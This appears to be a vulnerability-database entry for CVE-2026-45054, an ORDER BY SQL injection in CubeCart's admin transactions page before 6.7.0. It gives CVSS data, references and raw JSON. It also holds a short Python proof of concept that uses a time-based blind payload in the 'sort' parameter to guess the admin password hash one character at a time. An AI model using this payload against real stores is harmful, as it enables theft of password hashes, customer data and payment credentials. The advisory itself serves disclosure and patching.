CVE-2026-45054

Description

CubeCart is an ecommerce software solution. Prior to 6.7.0, the admin orders-transactions listing page (admin.php?_g=orders&node=transactions) builds a raw ORDER BY SQL fragment from the attacker-controlled $_GET['sort'] array without column or direction validation. Both the column key and the direction value flow into the query string as bare SQL tokens, and the framework's sqlSafe() (mysqli escape_string) escapes only quote characters — none of which are required for ORDER BY injection. An authenticated administrator with the minimum CC_PERM_READ permission on orders can execute arbitrary SQL against the store database, including time-based blind extraction of admin password hashes, customer PII, and integrated payment-gateway credentials. This vulnerability is fixed in 6.7.0.

CVSS Details

CVSS Score

4.9

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

CubeCart < 6.7.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

target_url = "http://example.com/admin.php"
params = {
    "_g": "orders",
    "node": "transactions",
    "sort[0]": "(CASE WHEN (SELECT SUBSTRING(password,1,1) FROM CubeCart_admin_users WHERE admin_id=1)='a' THEN (SELECT SLEEP(5)) ELSE 1 END)"
}
cookies = {
    "PHPSESSID": "authenticated_session_id_here"
}

response = requests.get(target_url, params=params, cookies=cookies)
if response.elapsed.total_seconds() > 5:
    print("Vulnerable: First character of hash is 'a'")
else:
    print("Not 'a'")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-45054
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-45054
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-45054/
[4] VulDB https://vuldb.com/cve/CVE-2026-45054
[5] https://github.com/cubecart/v6/security/advisories/GHSA-rm2f-rpcq-6w9f
[6] https://github.com/cubecart/v6/security/advisories/GHSA-rm2f-rpcq-6w9f

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-45054", "sourceIdentifier": "[email protected]", "published": "2026-05-13T21:16:49.270", "lastModified": "2026-05-14T16:49:18.583", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "CubeCart is an ecommerce software solution. Prior to 6.7.0, the admin orders-transactions listing page (admin.php?_g=orders&node=transactions) builds a raw ORDER BY SQL fragment from the attacker-controlled $_GET['sort'] array without column or direction validation. Both the column key and the direction value flow into the query string as bare SQL tokens, and the framework's sqlSafe() (mysqli escape_string) escapes only quote characters — none of which are required for ORDER BY injection. An authenticated administrator with the minimum CC_PERM_READ permission on orders can execute arbitrary SQL against the store database, including time-based blind extraction of admin password hashes, customer PII, and integrated payment-gateway credentials. This vulnerability is fixed in 6.7.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://github.com/cubecart/v6/security/advisories/GHSA-rm2f-rpcq-6w9f", "source": "[email protected]"}, {"url": "https://github.com/cubecart/v6/security/advisories/GHSA-rm2f-rpcq-6w9f", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}